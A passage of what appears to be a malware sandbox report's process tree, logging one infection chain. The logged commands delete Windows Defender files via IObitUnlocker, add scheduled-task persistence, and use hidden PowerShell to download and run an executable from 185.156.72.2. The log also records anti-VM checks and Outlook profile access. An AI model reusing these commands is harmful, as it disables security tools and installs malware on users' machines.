                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3132
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:2600
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:2132
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:548
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4508
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3272
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5208
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker
                                                            11⤵
                                                              PID:4560
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop IObitUnlocker
                                                                12⤵
                                                                • Launches sc.exe
                                                                PID:3576
                                                              • C:\Windows\system32\sc.exe
                                                                sc delete IObitUnlocker
                                                                12⤵
                                                                • Launches sc.exe
                                                                PID:624
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "4388"
                                                              11⤵
                                                                PID:3280
                                                                • C:\Windows\system32\taskkill.exe
                                                                  taskkill /f /pid "4388"
                                                                  12⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1548
                                                            • C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
                                                              Unlocker /newDiskSize
                                                              10⤵
                                                              • Sets service image path in registry
                                                              • Checks computer location settings
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4084
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
                                                                11⤵
                                                                  PID:980
                                                                  • C:\Windows\system32\sc.exe
                                                                    sc query IObitUnlocker
                                                                    12⤵
                                                                    • Launches sc.exe
                                                                    PID:5008
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker
                                                                  11⤵
                                                                    PID:2720
                                                                    • C:\Windows\system32\sc.exe
                                                                      sc stop IObitUnlocker
                                                                      12⤵
                                                                      • Launches sc.exe
                                                                      PID:3028
                                                                    • C:\Windows\system32\sc.exe
                                                                      sc delete IObitUnlocker
                                                                      12⤵
                                                                      • Launches sc.exe
                                                                      PID:2168
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "4084"
                                                                    11⤵
                                                                      PID:1136
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        taskkill /f /pid "4084"
                                                                        12⤵
                                                                        • Kills process with taskkill
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3604
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc start VMTools
                                                                    10⤵
                                                                    • Launches sc.exe
                                                                    PID:5612
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc start VMTools
                                                                    10⤵
                                                                    • Launches sc.exe
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2856
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c schtasks /create /tn "GgLfxM35V" /tr "C:\Temper\qUQ9sZlz.exe" /sc minute /mo 10 /ru "Admin" /f
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3036
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /create /tn "GgLfxM35V" /tr "C:\Temper\qUQ9sZlz.exe" /sc minute /mo 10 /ru "Admin" /f
                                                                  9⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:732
                                                          • C:\Users\Admin\AppData\Local\Temp\10495480101\20563e3f9a.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10495480101\20563e3f9a.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SendNotifyMessage
                                                            PID:5324
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c schtasks /create /tn PJSXAmabLH7 /tr "mshta C:\Users\Admin\Desktop\hYoO4p70j.hta" /sc minute /mo 10 /ru "Admin" /f
                                                              7⤵
                                                                PID:2964
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  schtasks /create /tn PJSXAmabLH7 /tr "mshta C:\Users\Admin\Desktop\hYoO4p70j.hta" /sc minute /mo 10 /ru "Admin" /f
                                                                  8⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:1900
                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                mshta C:\Users\Admin\Desktop\hYoO4p70j.hta
                                                                7⤵
                                                                • Checks computer location settings
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4356
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:APPDATA+'S6RJX63P2HWW9RDOHNOKDGXGPVAARWXC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;
                                                                  8⤵
                                                                  • Blocklisted process makes network request
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Downloads MZ/PE file
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5960
                                                                  • C:\Users\Admin\AppData\RoamingS6RJX63P2HWW9RDOHNOKDGXGPVAARWXC.EXE
                                                                    "C:\Users\Admin\AppData\RoamingS6RJX63P2HWW9RDOHNOKDGXGPVAARWXC.EXE"
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    PID:4828
                                                            • C:\Users\Admin\AppData\Local\Temp\10495790101\208f6d97e4.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10495790101\208f6d97e4.exe"
                                                              6⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:4524
                                                            • C:\Users\Admin\AppData\Local\Temp\10495950101\amnew.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10495950101\amnew.exe"
                                                              6⤵
                                                              • Checks computer location settings
                                                              • Executes dropped EXE
                                                              • Drops file in Windows directory
                                                              PID:2308
                                                              • C:\Users\Admin\AppData\Local\Temp\d96bd1b766\varen.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\d96bd1b766\varen.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4336
                                                            • C:\Users\Admin\AppData\Local\Temp\10495960101\sFFG7Wg.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10495960101\sFFG7Wg.exe"
                                                              6⤵
                                                              • Adds Run key to start application
                                                              PID:2284
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\GoogleChrome.exe"
                                                                7⤵
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                PID:5684
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\GoogleChrome.exe"
                                                                  8⤵
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  PID:3200
                                                                  • C:\Windows\system32\PING.EXE
                                                                    ping localhost -n 1
                                                                    9⤵
                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                    • Runs ping.exe
                                                                    PID:5152
                                                                  • C:\Users\Admin\AppData\Local\GoogleChrome.exe
                                                                    C:\Users\Admin\AppData\Local\GoogleChrome.exe
                                                                    9⤵
                                                                      PID:6068
                                                              • C:\Users\Admin\AppData\Local\Temp\10495970101\Fv6kVbJ.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\10495970101\Fv6kVbJ.exe"
                                                                6⤵
                                                                • Suspicious use of SetThreadContext
                                                                PID:4744
                                                                • C:\Users\Admin\AppData\Local\Temp\10495970101\Fv6kVbJ.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10495970101\Fv6kVbJ.exe"
                                                                  7⤵
                                                                    PID:6072
                                                                • C:\Users\Admin\AppData\Local\Temp\10495980101\blOahSM.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10495980101\blOahSM.exe"
                                                                  6⤵
                                                                  • Checks computer location settings
                                                                  PID:1384
                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7zr.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7zr.exe" x -aoa -p"vMgXworcvLkJ+c11mCsGQ" setup.7z
                                                                    7⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4788
                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\AutoIt3_x64.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\AutoIt3_x64.exe" libmmd.dll
                                                                    7⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2272
                                                                  • C:\Users\Admin\AppData\Local\Temp\10495980101\blOahSM.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10495980101\blOahSM.exe" -sfxwaitall:1 "timeout" /t 2 /nobreak
                                                                    7⤵
                                                                    • Checks computer location settings
                                                                    PID:5832
                                                                    • C:\Windows\System32\timeout.exe
                                                                      "C:\Windows\System32\timeout.exe" /t 2 /nobreak
                                                                      8⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:3016
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                    7⤵
                                                                      PID:3156
                                                                  • C:\Users\Admin\AppData\Local\Temp\10495990101\oSOnryg.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10495990101\oSOnryg.exe"
                                                                    6⤵
                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                    PID:536
                                                                  • C:\Users\Admin\AppData\Local\Temp\10496000101\4eTHv9F.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10496000101\4eTHv9F.exe"
                                                                    6⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:4184
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                      7⤵
                                                                      • Accesses Microsoft Outlook profiles
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • outlook_office_path
                                                                      • outlook_win_path
                                                                      PID:4516
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\Admin\AppData\Local\Temp\sy00esrw.vng"
                                                                        8⤵
                                                                        • Enumerates system info in registry
                                                                        • Suspicious use of AdjustPrivilegeToken
